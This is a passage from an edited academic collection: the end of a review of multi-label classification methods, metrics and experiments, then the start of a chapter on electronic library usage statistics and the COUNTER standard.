data set as a single label. It learns one single-label classifier H: X → P(L) , where P(L) is the power set of L. Table 4 shows the result of transforming the data set of Table 1 using this method. One of the negative aspects of PT3 is that it may lead to data sets with a large number of classes and few examples per class. PT3 has been used in the past by Boutell et al. (2004) and Diplaris, Tsoumakas, Mitkas, and Vlahavas (2005). The most common problem transformation method (dubbed PT4) learns |L| binary classifiers Hl: X → {l, ¬l}, one for each different label l in L. It transforms the original data set into |L| data sets Dl that contain all examples of the original data set, labelled as l, if the labels of the original example contained l and as ¬l otherwise. It is the same solution used in order to deal with a single-label multi-class problem using a binary classifier. For the classification of a new instance x, this method outputs as a set of labels, the union of the labels that are output by the |L| classifiers:
H_PT4(x) = ∪_{l ∈ L} { l : H_l(x) = l }.
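As a minimal illustration of this transformation and prediction rule (a self-contained sketch, not the implementation used in the experiments later in this article), the code below builds the |L| binary data sets and forms the union of positive predictions; the per-label binary learner is left abstract, and the toy example reuses only the label sets of Table 1, with real features omitted.

```python
# Hedged sketch of PT4: one binary data set per label, union-based prediction.
def pt4_transform(examples, labels):
    """Create |L| binary data sets D_l: every example keeps its features (x)
    and is relabelled as 1 (has label l) or 0 (does not have label l)."""
    return {l: [(x, int(l in Y)) for (x, Y) in examples] for l in labels}

def pt4_predict(binary_classifiers, x):
    """H_PT4(x): the union of labels whose binary classifier fires on x."""
    return {l for l, h in binary_classifiers.items() if h(x)}

examples = [("d1", {"Sports", "Politics"}), ("d2", {"Science", "Politics"}),
            ("d3", {"Sports"}), ("d4", {"Religion", "Science"})]
datasets = pt4_transform(examples, ["Sports", "Religion", "Science", "Politics"])
print(datasets["Sports"])   # [('d1', 1), ('d2', 0), ('d3', 1), ('d4', 0)]
```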
Figure 1 shows the four data sets that are constructed by PT4, when applied to the data set of Table 1. PT4 has been used in the past by Boutell et al. (2004), Goncalves and Quaresma (2003), Lauser and Hotho (2003), and Li & Ogihara (2003). A straightforward, yet undocumented, problem transformation method is the following (dubbed PT5). Firstly, it decomposes each example (x, Y) into |Y| examples (x, l) for all l ∈ Y. Then it learns one single-label distribution classifier from the transformed data set. Distribution classifiers are those classifiers that can output a distribution of certainty degrees (or probabilities) for all labels in L. Finally, it postprocesses this distribution to output a set of labels. One simple way to achieve this is to output those labels for which the certainty degree is greater than a specific threshold (e.g., 0.5). A more complex way is to output those labels for which the certainty degree is greater than a percentage (e.g., 70%) of the highest certainty
degree. Table 5 shows the result of transforming the data set of Table 1 using this method.

Figure 1. The four data sets that are constructed by PT4

(a)
| Example | Sports | ¬Sports |
|---------|--------|---------|
| 1       | X      |         |
| 2       |        | X       |
| 3       | X      |         |
| 4       |        | X       |

(b)
| Example | Politics | ¬Politics |
|---------|----------|-----------|
| 1       | X        |           |
| 2       | X        |           |
| 3       |          | X         |
| 4       |          | X         |

(c)
| Example | Religion | ¬Religion |
|---------|----------|-----------|
| 1       |          | X         |
| 2       |          | X         |
| 3       |          | X         |
| 4       | X        |           |

(d)
| Example | Science | ¬Science |
|---------|---------|----------|
| 1       |         | X        |
| 2       | X       |          |
| 3       |         | X        |
| 4       | X       |          |

Table 5. Transformed data set using PT5

| Example | Class    |
|---------|----------|
| 1       | Sports   |
| 1       | Politics |
| 2       | Science  |
| 2       | Politics |
| 3       | Sports   |
| 4       | Religion |
| 4       | Science  |

Table 6. Transformed data set using PT6

| Example | Label    | Y[l] |
|---------|----------|------|
| 1       | Sports   | 1    |
| 1       | Religion | −1   |
| 1       | Science  | −1   |
| 1       | Politics | 1    |
| 2       | Sports   | −1   |
| 2       | Religion | −1   |
| 2       | Science  | 1    |
| 2       | Politics | 1    |
| 3       | Sports   | 1    |
| 3       | Religion | −1   |
| 3       | Science  | −1   |
| 3       | Politics | −1   |
| 4       | Sports   | −1   |
| 4       | Religion | 1    |
| 4       | Science  | 1    |
| 4       | Politics | −1   |
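The PT5 decompose-and-threshold scheme can be sketched as follows; this is an illustration only, and the certainty distribution used in the usage example is made up rather than produced by a trained classifier.

```python
# Hedged sketch of PT5: decompose multi-label examples into single-label ones,
# then turn a distribution classifier's certainty degrees into a label set.
def pt5_transform(examples):
    """Decompose every (x, Y) into |Y| single-label examples (x, l)."""
    return [(x, l) for (x, Y) in examples for l in Y]

def pt5_predict(distribution, threshold=0.5):
    """Keep the labels whose certainty degree reaches the threshold."""
    return {l for l, c in distribution.items() if c >= threshold}

examples = [("d1", {"Sports", "Politics"}), ("d2", {"Science", "Politics"}),
            ("d3", {"Sports"}), ("d4", {"Religion", "Science"})]
print(pt5_transform(examples))
# A made-up certainty distribution for some new document:
print(pt5_predict({"Sports": 0.7, "Politics": 0.6, "Religion": 0.1, "Science": 0.2}))
# -> {'Sports', 'Politics'}
```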
Algorithm Adaptation Methods
Clare and King (2001) adapted the C4.5 algorithm for multi-label data. They modified the formula of entropy calculation as follows:
entropy(S) = −∑_{i=1}^{|L|} ( p(ci) log p(ci) + q(ci) log q(ci) ),
where p(ci) = relative frequency of class ci and q(ci) = 1−p(ci). They also allowed multiple labels in the leaves of the tree. Adaboost.MH and Adaboost.MR (Schapire & Singer, 2000) are two extensions of AdaBoost (Freund & Schapire, 1997) for multi-label classification. They both apply AdaBoost on weak classifiers of the form H:X ×L → R. In AdaBoost. MH, if the sign of the output of the weak classifiers is positive for a new example x and a label l, then we consider that this example can be labelled with l; while if it is negative, then this example is not labelled with l. In AdaBoost.MR, the output of the weak classifiers is considered for ranking each of the labels in L. Although these two algorithms are adaptations of a specific learning approach, we notice that at their core, they actually use a problem trans-
formation (dubbed PT6). Each example (x, Y) is decomposed into |L| examples (x, l, Y[l]), for all l ∈ L, where Y[l] = 1 if l ∈ Y, and Y[l] = −1 otherwise. Table 6 shows the result of transforming the data set of Table 1 using this method. ML-kNN (Zhang & Zhou, 2005) is an adaptation of the kNN lazy learning algorithm for multi-label data. Actually this method follows the paradigm of PT4. In essence, ML-kNN uses the kNN algorithm independently for each label l: It finds the k nearest examples to the test instance and considers those that are labelled at least with l as positive and the rest as negative. What mainly differentiates this method from the application of the original kNN algorithm to the transformed problem using PT4 is the use of prior probabilities.
ML-kNN also has the capability of producing a ranking of the labels as an output. Luo and Zincir-Heywood (2005) present two systems for multi-label document classification, which are also based on the kNN classifier. The main contribution of their work is on the preprocessing stage for the effective representation of documents. For the classification of a new instance, the systems initially find the k nearest examples. Then, for every appearance of each label in each of these examples, they increase a corresponding counter for that label. Finally, they output the N labels with the largest counts. N is chosen based on the number of labels of the instance. This is an inappropriate strategy for real-world use, where the number of labels of a new instance is unknown. McCallum (1999) defines a probabilistic generative model according to which each label generates different words. Based on this model, a multi-label document is produced by a mixture of the word distributions of its labels. The parameters of the model are learned by maximum a posteriori estimation from labelled training documents, using expectation maximization to calculate both the mixture weights and the word distributions for each label. Given a new document, the most likely label set is selected by Bayes rule. This approach to the classification of a new document actually follows the paradigm of PT3, where each set of labels is considered independently as a new class. Elisseeff and Weston (2002) present a ranking algorithm for multi-label classification. Their algorithm follows the philosophy of support vector machines (SVMs). It is a linear model that tries to minimize a cost function while maintaining a large margin. The cost function they use is ranking loss, which is defined as the average fraction of pairs of labels that are ordered incorrectly. However, as stated earlier, the disadvantage of a ranking algorithm is that it does not output a set of labels.
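The basic neighbour-counting idea behind the lazy methods discussed above can be sketched as follows; this is not ML-kNN itself (which additionally uses prior and posterior probabilities), and the features, k, and voting threshold are illustrative assumptions.

```python
# Hedged sketch: count each label among the k nearest neighbours and keep
# the labels seen in at least half of them.
from collections import Counter
from math import dist

def knn_multilabel(train, x, k=3, min_votes=0.5):
    """train: list of (feature_vector, label_set); x: feature vector."""
    neighbours = sorted(train, key=lambda ex: dist(ex[0], x))[:k]
    votes = Counter(l for _, Y in neighbours for l in Y)
    return {l for l, n in votes.items() if n / k >= min_votes}

train = [([1.0, 0.1], {"Sports", "Politics"}), ([0.9, 0.2], {"Sports"}),
         ([0.1, 0.9], {"Science", "Politics"}), ([0.2, 0.8], {"Religion", "Science"})]
print(knn_multilabel(train, [0.95, 0.15]))   # -> {'Sports'}
```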
Godbole and Sarawagi (2004) present two improvements for the SVM classifier in conjunction with the PT4 method for multi-label classification. The first improvement easily could be abstracted in order to be used with any classification algorithm and, thus, could be considered an extension to PT4. The main idea is to extend the original data set with |L| extra features containing the predictions of each binary classifier. Then a second round of training |L| new binary classifiers takes place, this time using the extended data sets. For the classification of a new example, the binary classifiers of the first round are initially used, and their output is appended to the features of the example to form a meta-example. This metaexample is then classified by the binary classifiers of the second round. Through this extension, the approach takes into consideration the potential dependencies among the different labels. Note here that this improvement is actually a specialized case of applying Stacking (a method for the combination of multiple classifiers) (Wolpert, 1992) on top of PT4. The second improvement of Godbole and Sarawagi (2004) is SVM specific and concerns the margin of SVMs in multi-label classification problems. They improve the margin by a) removing very similar negative training instances, which are within a threshold distance from the learned hyperplane, and b) removing negative training instances of a complete class, if it is very similar to the positive class, based on a confusion matrix that is estimated using any fast and moderately accurate classifier on a held-out validation set. Note here that the second approach for margin improvement is actually SVM independent. Therefore, it could also be used as an extension to PT4. MMAC (Thabtah, Cowling, & Peng, 2004) is an algorithm that follows the paradigm of associative classification, which deals with the construction of classification rule sets using association rule mining. MMAC learns an initial
set of classification rules through association rule mining, removes the examples associated with this rule set, and recursively learns a new rule set from the remaining examples until no further frequent items are left. These multiple rule sets might contain rules with similar preconditions but different labels on the right hand side. Such rules are merged into a single multi-label rule. The labels are ranked according to the support of the corresponding individual rules.
ISSUES

How Much Multi-Label is a Data Set?

Not all data sets are equally multi-label. In some applications, the number of labels for each example is small compared to |L|, while in others it is large. This could be a parameter that influences the performance of the different multi-label methods. Here we introduce the concepts of label cardinality and label density of a data set. Let D be a multi-label data set consisting of |D| multi-label examples (x_i, Y_i), i = 1..|D|.

Definition 1: Label cardinality of D is the average number of labels of the examples in D,

LC(D) = \frac{1}{|D|} \sum_{i=1}^{|D|} |Y_i|.

Definition 2: Label density of D is the average number of labels of the examples in D divided by |L|,

LD(D) = \frac{1}{|D|} \sum_{i=1}^{|D|} \frac{|Y_i|}{|L|}.

Label cardinality is independent of the number of labels |L| in the classification problem, and is used to quantify the number of alternative labels that characterize the examples of a multi-label training data set. Label density takes into consideration the number of labels in the classification problem. Two data sets with the same label cardinality, but with a great difference in the number of labels (different label density), might not exhibit the same properties and cause different behavior to the multi-label classification methods. The two metrics are related to each other: LC(D) = |L| \cdot LD(D).

Evaluation Metrics

Multi-label classification requires different metrics than those used in traditional single-label classification. This section presents the various metrics that have been proposed in the literature. Let D be a multi-label evaluation data set, consisting of |D| multi-label examples (x_i, Y_i), i = 1..|D|, Y_i ⊆ L. Let H be a multi-label classifier and Z_i = H(x_i) be the set of labels predicted by H for example x_i. Schapire and Singer (2000) consider the HammingLoss, which is defined as:

HammingLoss(H, D) = \frac{1}{|D|} \sum_{i=1}^{|D|} \frac{|Y_i \Delta Z_i|}{|L|},

where Δ stands for the symmetric difference of two sets and corresponds to the XOR operation in Boolean logic. The following metrics are used by Godbole and Sarawagi (2004) for the evaluation of H on D:

Accuracy(H, D) = \frac{1}{|D|} \sum_{i=1}^{|D|} \frac{|Y_i \cap Z_i|}{|Y_i \cup Z_i|},

Precision(H, D) = \frac{1}{|D|} \sum_{i=1}^{|D|} \frac{|Y_i \cap Z_i|}{|Z_i|}, and

Recall(H, D) = \frac{1}{|D|} \sum_{i=1}^{|D|} \frac{|Y_i \cap Z_i|}{|Y_i|}.

Boutell et al. (2004) give a more generalized version of the above accuracy using a parameter α ≥ 0, called forgiveness rate:

Accuracy(H, D) = \frac{1}{|D|} \sum_{i=1}^{|D|} \left( \frac{|Y_i \cap Z_i|}{|Y_i \cup Z_i|} \right)^{\alpha}.
This parameter is used in order to control the forgiveness of errors that are made in predicting labels. They also give an even more generalized version of the accuracy by introducing two additional parameters in order to allow different costs for false positives and true negatives. These two general measures of accuracy are too complex, due to the additional parameters, but could be useful in certain applications.
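A direct transcription of the above metrics into code may help make the set notation concrete. The sketch below is illustrative only; the toy label sets and the conventions for empty true or predicted sets (which the formulas above leave unspecified) are our own.

```python
# Example-based multi-label metrics from the section above.
# Y[i] and Z[i] are the true and predicted label sets for example i.
def hamming_loss(Y, Z, L):
    return sum(len(y ^ z) for y, z in zip(Y, Z)) / (len(Y) * len(L))

def accuracy(Y, Z, alpha=1.0):
    # alpha is the forgiveness rate of Boutell et al.; alpha=1 gives the
    # Godbole and Sarawagi accuracy. Empty unions are scored 1.0 (a convention).
    return sum((len(y & z) / len(y | z)) ** alpha if y | z else 1.0
               for y, z in zip(Y, Z)) / len(Y)

def precision(Y, Z):
    return sum(len(y & z) / len(z) if z else 0.0 for y, z in zip(Y, Z)) / len(Y)

def recall(Y, Z):
    return sum(len(y & z) / len(y) if y else 0.0 for y, z in zip(Y, Z)) / len(Y)

def label_cardinality(Y):
    return sum(len(y) for y in Y) / len(Y)

def label_density(Y, L):
    return label_cardinality(Y) / len(L)

if __name__ == "__main__":
    L = {"a", "b", "c", "d"}
    Y = [{"a", "b"}, {"c"}, {"a", "d"}]        # true label sets
    Z = [{"a"}, {"c", "d"}, {"a", "b", "d"}]   # predicted label sets
    print(hamming_loss(Y, Z, L))   # (1 + 1 + 1) / (3 * 4) = 0.25
    print(accuracy(Y, Z))          # (1/2 + 1/2 + 2/3) / 3 ≈ 0.556
    print(label_cardinality(Y), label_density(Y, L))   # 1.67 and 0.42
```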
EXPERIMENTAL COMPARISON OF PT METHODS We implemented the PT3, PT4, and PT6 methods in Java, within the framework of the WEKA (Witten & Frank, 1999) library of machine learning algorithms, and made the software publicly available at the following URL (mlkd.csd.auth.gr/multilabel.html). We experimented with the three PT methods in conjunction with the following classifier learning algorithms: kNN (Aha, Kibler, & Albert, 1991), C4.5 (Quinlan, 1993), naive Bayes (John & Langley, 1995), and SMO (Platt, 1998). For performance evaluation, we used the HammingLoss, Accuracy, Precision,
and Recall metrics that were presented in the previous section. We experimented on the following multi-label data sets: genbase (Diplaris et al., 2005) and yeast (Elisseeff & Weston, 2002), which are biological data sets that are concerned with protein function classification and gene function classification, respectively. The scene data set (Boutell et al., 2004) contains data related to a scene classification problem. These data sets were retrieved from the site of the support vector classification library (LIBSVM) (Chang & Lin, 2001), and transformed to a specific format that is suitable for our software, based on the ARFF file format of the WEKA library. The transformed data sets are also available at the aforementioned URL. The details of the data sets, such as the number of examples, the number of numeric and discrete attributes, the number of classes, and their label density are given in Table 7.

Table 7. Examples, numeric and discrete attributes, labels, and LD of data sets (data sets: genbase, yeast, scene)

We notice that genbase (LD = 0.05) and scene (LD = 0.18) are quite sparse multi-label data sets with less than 1.5 labels per example on average. The yeast data set, on the other hand, is denser (LD = 0.30), with more than 4 labels per example on average. Table 8 presents analytical results on the three data sets. We will first discuss the results in terms of accuracy. The combination of the PT3 method together with the SMO learning algorithm gives the best results in each of the three data sets. In addition, the PT3 method has the highest mean accuracy for all learning algorithms in each of the three data sets, followed by PT4 and then
by PT6. This means that it is the best method independent of the learning algorithm in each of the three data sets. This is an interesting result, given that the PT3 method is not as popular in the literature as PT4. We will now discuss the results in terms of HammingLoss. In genbase, the best results are obtained with PT4 in combination with either kNN or SMO. In yeast, the best results are obtained again with PT4 in combination with SMO, while in scene the best results are obtained with PT3 in conjunction with SMO. Independent of the algorithm used, PT3 is the best method in scene, PT4 in genbase, and PT6 in yeast. One noteworthy result is that PT6 does not perform well in combination with SMO for the scene and genbase data sets. Note that these two data sets are quite sparse as LD(scene) = 0.18 and LD(genbase) = 0.05. This means that after the transformation, the class attribute will have a large number of examples with a value of –1. It seems that in these cases SMO learns to predict always –1. This leads to zero accuracy, precision, and recall, while HammingLoss becomes equal to the label density of the data set.
CONCLUSION AND FUTURE WORK This work was involved with the task of multi-label classification. It introduced the problem, gave an organized presentation of the methods that exist in the literature, and provided comparative experimental results for some of these methods. To the best of our knowledge, there is no other review article on the interesting and upcoming task of multi-label classification. In the future we intend to perform a finergrained categorization of the different multi-label classification methods and perform more extensive experiments with more data sets and methods. We also intend to perform a comparative experimental study of problem adaptation methods.
REFERENCES

Aha, D. W., Kibler, D., & Albert, M. K. (1991). Instance-based learning algorithms. Machine Learning, 6(1), 37-66.

Boutell, M. R., Luo, J., Shen, X., & Brown, C. M. (2004). Learning multi-label scene classification. Pattern Recognition, 37(9), 1757-1771.

Chang, C.-C., & Lin, C.-J. (2001). LIBSVM: A library for support vector machines. Retrieved from http://www.csie.ntu.edu.tw/~cjlin/libsvm

Clare, A., & King, R. D. (2001). Knowledge discovery in multi-label phenotype data. Proceedings of the 5th European Conference on Principles of Data Mining and Knowledge Discovery (PKDD 2001).

Diplaris, S., Tsoumakas, G., Mitkas, P., & Vlahavas, I. (2005). Protein classification with multiple algorithms. Proceedings of the 10th Panhellenic Conference on Informatics (PCI 2005).

Elisseeff, A., & Weston, J. (2002). A kernel method for multi-labelled classification. Paper presented to Advances in Neural Information Processing Systems 14.

Freund, Y., & Schapire, R. E. (1997). A decision-theoretic generalization of on-line learning and an application to boosting. Journal of Computer and System Sciences, 55(1), 119-139.

Godbole, S., & Sarawagi, S. (2004). Discriminative methods for multi-labeled classification. Proceedings of the 8th Pacific-Asia Conference on Knowledge Discovery and Data Mining (PAKDD 2004).

Goncalves, T., & Quaresma, P. (2003). A preliminary approach to the multilabel classification problem of Portuguese juridical documents. Proceedings of the 11th Portuguese Conference on Artificial Intelligence (EPIA '03).
Jin, R., & Ghahramani, Z. (2002). Learning with multiple labels. Proceedings of Neural Information Processing Systems 2002 (NIPS 2002).

John, G., & Langley, P. (1995). Estimating continuous distributions in Bayesian classifiers. Proceedings of the 11th Conference on Uncertainty in Artificial Intelligence.

Lauser, B., & Hotho, A. (2003). Automatic multilabel subject indexing in a multilingual environment. Proceedings of the 7th European Conference in Research and Advanced Technology for Digital Libraries (ECDL 2003).

Li, T., & Ogihara, M. (2003). Detecting emotion in music. Proceedings of the International Symposium on Music Information Retrieval.

Luo, X., & Zincir-Heywood, A. N. (2005). Evaluation of two systems on multi-class multi-label document classification. Proceedings of the 15th International Symposium on Methodologies for Intelligent Systems.

Maron, O., & Lozano-Perez, T. (1997). A framework for multiple-instance learning. Proceedings of Neural Information Processing Systems 1997 (NIPS 1997).
McCallum, A. (1999). Multi-label text classification with a mixture model trained by EM. Proceedings of the AAAI '99 Workshop on Text Learning.

Platt, J. (1998). Fast training of support vector machines using sequential minimal optimization. In B. Scholkopf, C. Burges, & A. Smola (Eds.), Advances in kernel methods: Support vector learning. MIT Press.

Quinlan, J. R. (1993). C4.5: Programs for machine learning. Morgan Kaufmann.

Schapire, R. E., & Singer, Y. (2000). Boostexter: A boosting-based system for text categorization. Machine Learning, 39(2/3), 135-168.

Thabtah, F. A., Cowling, P., & Peng, Y. (2004). MMAC: A new multi-class, multi-label associative classification approach. Proceedings of the 4th IEEE International Conference on Data Mining (ICDM '04).

Witten, I. H., & Frank, E. (1999). Data mining: Practical machine learning tools with Java implementations. Morgan Kaufmann.

Wolpert, D. H. (1992). Stacked generalization. Neural Networks, 5, 241-259.

Zhang, M.-L., & Zhou, Z.-H. (2005). A k-nearest neighbor based algorithm for multi-label classification. Proceedings of the 1st IEEE International Conference on Granular Computing.
This work was previously published in the International Journal of Data Warehousing and Mining, edited by D. Taniar, Volume 3, Issue 3, pp. 1-13, copyright 2007 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
Chapter 1.22
Electronic Usage Statistics Patricia Hults Rensselaer Polytechnic Institute, USA
ABSTRACT This chapter provides an overview of electronic usage statistics, including methods of defining, collecting, and using the data. A survey of some of the systems of estimating journal usage in the print environment is followed by a description of the development of electronic usage practices. The important contributions of the COUNTER and SUSHI projects are reviewed, along with issues in the management and use of electronic statistics. Examples of ways these statistics can assist in decision making throughout a product’s life cycle are included, as well as other ways usage statistics can prove useful. The chapter concludes with a brief look at the use of statistics in the bibliomining process.
INTRODUCTION Unless you have a mathematical bent or are one of those individuals who find satisfaction memorizing the major league baseball stats, the topic of
user statistics is not immediately intriguing. In fact, it can be mind numbing and tedious, but user statistics are extremely useful, particularly now that we are able to get real, meaningful information—they cannot be ignored. This chapter will start with an examination of early, pre-electronic usage statistics. It will then look at the development of electronic statistics, including both the COUNTER and SUSHI standards. Management issues in collecting and using these statistics will be explored. Some of the applications of these data will be discussed, in the context of an electronic product’s life cycle. The value of usage statistics beyond just product evaluation will also be covered. Generations of librarians have struggled to find ways to practically measure usage of the material they so carefully select. The information on just how many times a book or journal was used is critical in both selection and retention decisions, and in broader collection development strategies. Without a sense of how many times something is used, it becomes impossible to evaluate its worth.
BACKGROUND Books have always presented less of a problem. You could count the number of times a book was checked out, whether you were counting circulation cards or looking at automatically generated circulation statistics. There was still the bugaboo of in-house use, but there were significant amounts of real circulation data available. Journals presented a much larger challenge. Not only were many libraries organized so that journals were never checked out and sat on open shelves; journals came both bound and in single issues, so that the unit of count was unclear. Indexes, while officially in book format, generally never circulated and therefore their use was as hard to quantify as it was for journals. Because librarians are an ingenious group, all sorts of methods were devised to estimate inhouse use of journals and books and in general to evaluate the worth of a particular title. These efforts ranged from using photocopying requests (Cooper & McGregor, 1994), making correlations between check-outs and in-house use (Walter, 1996), counting journals left on study carrels and near photocopy machines (Bader & Thompson, 1989; Chen, 1972), sticking voluntary usage log sheets on journal protective covers (Konopasek & O’Brien, 1982), and more. Some librarians sent their work-study students skulking in the stacks, trying to measure the ratio of actual vs. recorded use. Other efforts included using external criteria such as journal impact factors and citation analysis (McCain & Bobick, 1981; Rice, 1979). The journal impact factor is a measure of the number of times a journal is cited in published articles. Interestingly, at least one recent study examining electronic usage and impact factor found no correlation between impact factor and local use of the journals. Duy and Vaughan (2006) examined use of electronic journals from three major vendors; the American Chemical Society, Elsevier, and Wiley, and they found there was not
a correlation between impact factor of a particular journal and actual use of that journal on their campus. What they did find more predictive was a local citation figure, calculated by determining how many times a specific journal was cited in articles by campus faculty.
DEVELOPMENT OF ELECTRONIC STATISTICS Librarians continued the tradition of ingenuity when journals, books, and databases began to be available in electronic format, and they quickly began trying to extract more reliable statistics from the new medium. Before publishers began supplying usage information, librarians explored other sources including institutional Website logs, statistics supplied by A-Z list providers, and those generated by link resolvers. While each of these offered interesting insight into patterns of use, they fell far short of accurately and fully capturing the information librarians sought. Unless an institution had loaded the product on its own server, it was clear that publishers would be the primary suppliers of usage statistics. Initially this data varied widely in what was being measured, and many times, what was being measured was fairly meaningless. An example is the number of pages called up from anywhere within the publisher’s site, including help pages, menu pages, and so forth. This type of count served only to create an inaccurate impression of use. In response to pressures from librarians and for their own internal management needs, publishers began attempting to measure journal usage. Some began to supply pages that captured the number of downloaded files from a particular site. This was progress, but it was still very messy. Article and chapters were often divided into multiple files to reduce download time and each component of a single article might be counted as an individual use, greatly inflating overall usage rates. One publisher’s response to statistics requests was to
provide the raw data log (Table 1). At least one hapless librarian ended up manually parsing and counting the log files to come up with a reasonable statistic. It was becoming clear that to realize the promise of electronic statistics, some sort of standardization was imperative. Professionals in both the library and the publishing world began to systematically approach the issue. The JSTOR user group was an early participant in laying out the desired elements of e-statistics, beginning the work in 1997 (JSTOR, 1998). In 1998, that work was expanded when the International Coalition of Library Consortia (ICOLC, 1998) released “Guideline for Statistical Measures of Usage of Web-based Indexed, Abstracted, and Full Text Resources.” Such recommendations started laying out just what elements would be needed to give meaningful information. Even with these guidelines, information received from publishers continued to be highly variable. A count of article usage or number of
database searches sounds straightforward, but the way these were calculated could be very different. An article count might vary depending on how the article was segmented, whether links to graphics were a separate count, how printing and downloading the article was counted, how repeated use of an article within a short time was counted, whether articles linked to outside the publisher’s Website were counted and how. Even what constitutes an article could be variable. Business resources tend to supply statistical graphs, company data, and other type of information that falls outside the standard definition of an article. In fact, at the time this chapter was written, business full-text information remains one of the most problematic subject areas for obtaining standardized user statistics. Session and search counts also had their inconsistencies. How were repeated logins by the same user within a short time counted? How were searches that include more than one database counted—as one search or two or more? It gets
even more complicated when federated searching is thrown into the mix. A single federated search may generate 20 or more searches (Pesch, 2004). How do you count these? Another problem was that the way a particular publisher produced its usage data might change, creating significantly different statistics as the method of count was revised. If your publisher changed the way statistics were calculated, the library may have to go back to reharvest data in order to get some consistency, if the older data was available in the new format at all. Another variable was the amount of retrospective data provided by the publisher, impacting how frequently statistics needed to be harvested. The reliability of the publisher providing the data also determined the frequency of pulling those statistics. While publisher statistics were evolving, it behooved an institution to harvest frequently to avoid losing data altogether. The method of providing the statistics also varied widely, some publishers allowing user generated reports, others limited to requests sent to the publisher, some available only through the consortia manager. The format of the reports, even those containing comparable information, could differ widely, requiring significant intervention to be useful. By 2000, less than half of publishers offering electronic journals provided usage statistics (Luther, 2000, p. 1), but the momentum was building. In 2000 and 2001 several significant studies and papers were released addressing the issue of standardized statistics for electronic products. 2000 saw Judy Luther’s “White Paper on Electronic Journals Usage Statistics,” and the initiation of the ARL (Association of Research Libraries) E-Metrics Project. In 2001 ARL released its phase II report (Shim, McClure, Fraser, Bertot, Dagli, & Leahy, 2001) and the IMLS (Institute of Museum and Library Services) published its report, “Developing National Public Library Statistics and Performance Measures for the Networked Environment,” (Bertot, McClure, &
Ryan, 2000). Other initiatives occurring during this time frame included those by the National Commission on Libraries and Information Science and NISO’s revision of the Z39.7 standard. These early efforts were the background in which the COUNTER Project (Counting Online Usage of NeTworked Electronic Resources) emerged out of work being done by PALS (Publishers and Librarian Solutions). The PALS usage statistics working group began laying the framework COUNTER would codify. The group initially developed a code of practice including identification of data elements, definitions of these elements, report format recommendations and recommendations on delivery method (JISC, n.d.). This work evolved into the COUNTER Project, which received its own identity in 2002. Its remarkable success is due in large part to its collaborative nature, involving librarians, publishers, and professional societies. The first release of the code of practice appeared in January 2003. To insure long-term development of the standards, COUNTER was incorporated in the United Kingdom later in 2003. By 2006, due in large part to the COUNTER Project and the earlier work it stands upon, virtually all major, and many smaller publishers provided standardized reports—a phenomenal turn around. The standards have elegance to them. They are not complicated statistics, although producing them can be challenging. They are based on the concept that it is better to have simple, useful statistics that can be provided by all publishers and understood by all users, than complicated reports beyond the scope of many publishers (Shepherd, 2004). This strategy has paid off producing a large number of COUNTER compliant publishers in a remarkably short time, 51 at the time of this writing. Release 1 covered only journal and database reports. It answered the basic questions of how a search and an article download are defined, what a report should contain, in what format it should be available, and how frequently it should
be produced. When publishers became compliant with these standards, it started to become possible to compare and evaluate across publisher platforms, although there is still work to be done to insure consistency across platforms (Davis & Price, 2006). Release 2 of the code of practice for journals and databases did not expand on the set of data elements. Rather, it refined the content of reports, and most significantly, spelled out very carefully the steps necessary to prove compliance. For these standards to be widely accepted there needed to be a method to verify that any particular publisher was in fact, counting what COUNTER specifies as standard. The auditing method includes very specific protocol to that end. First a vendor notifies COUNTER that it would like to be authenticated as compliant. The reports are then tested at an approved test library to verify the accuracy of the reports. Only when the test library is satisfied is the vendor certified compliant. Once a vendor has achieved compliant status as verified by a test library, it has 18 months to complete an audit. This audit includes very specific instructions on the types of tests to be performed. These include specifications of the number of searches or downloads to be done, and the time intervals between searches and downloads, which are then matched against the usage report provided by the vendor. After the initial audit, annual audits are required to maintain compliant status. For Release 2, vendors must be initially audited by June 30, 2007, with annual audits required beginning in 2008 (COUNTER, n.d.). Along with release 2 for journals and databases, release 1 for books and reference works appeared in 2006. Like the code of practice for journals and databases, the basic elements of the statistics were defined. Electronic book and encyclopedia statistics are even more challenging, since the basic unit of use is not as discrete or easily defined as a journal article. Along with defining these data elements, the necessary content
of a report was also laid out, paralleling journal and database reports. Although COUNTER has gone a long ways to standardize and make useful statistics provided by publishers, there are still some limitations. COUNTER does not addressed the problem of restricting statistics to those generated only by the subscription in question. At least one major publisher regularly includes uses of journals temporarily turned on for promotional use and downloads of titles generated within the institution’s IP range, but not subscribed to by the institution. An institution can end up with usage figures for journals it does not subscribe to, but that are subscribed to by individuals within the IP range, such as researchers or professors. If there are multiple subscriptions to the same journal by both the library and individuals, all the usage figures go into the same report. Filtering out data for journals not subscribed to is tedious and becomes even more problematic as statistical gathering becomes automated. COUNTER has decided that requiring publishers to indicate subscription status would complicate statistical compilation too much. Given the variety of ways institutions have access to journals, such as package deals, current subscriptions and archival subscriptions, and the increasing number of journals that are a combination of open access and fee based, it would be prohibitively complicated to try and sort these access methods out. (P. Shepherd, personal communication, Dec. 14, 2006). Another problem identified by Davis and Price (2006) is the fact that the publisher platform design and functionality can change the usage count. They studied the ratio of HTML to PDF downloads within publisher platforms. The ratio was consistent from journal to journal, but changed from platform to platform. They also examined one journal mounted on two different platforms and confirmed that the platform varied the format ratio. Some platforms force users into the HTML version first, which then links to the PDF. Other
platforms allow users to pick the full-text format from the citation or abstract level, thus reducing the number of HTML downloads and consequently total downloads. Platforms also interface with URL resolvers and indexes differently. Some link directly to the PDF, others link to a higher level of the journal and force more downloads to navigate to the PDF. These varying methods influence the total number of downloads. Davis and Price suggest using a normalization factor when attempting to compare use across platforms. Although usage statistics have improved significantly, you only have to go through the exercise of pulling the same statistics for a year you have already harvested once before to realize that there is still a lot of flux in the reliability and availability of the data. The author recently did just that, in preparation for this chapter, and found a disconcerting lack of consistency. One-half year of the data for one publisher was inexplicably missing. Most probably, the publisher would be able to recreate that data, if requested, but on occasion data is just lost. One or two other publishers had corrected errors in previously supplied statistics, a good thing, but which led to inconsistency with data gathered and used a year before. Other publishers had recently become COUNTER compliant and the format and count of data had changed accordingly. Experiences like these lend support to including other criteria in evaluation of electronic products. Outside the scope of COUNTER is the problem of the sheer volume of statistics coming from multiple sources and in different packages. Library staff have began spending significant time pulling the reports from various sites and trying to merge them into a unified report covering statistics from all the electronic sources of the library. Bordeaux (Bordeaux, Kraemer, & Sullenger, 2005) reported spending 16 hours per month pulling and compiling data; the staff of the author’s institution spends an average 14 hours per month. As library holdings migrate
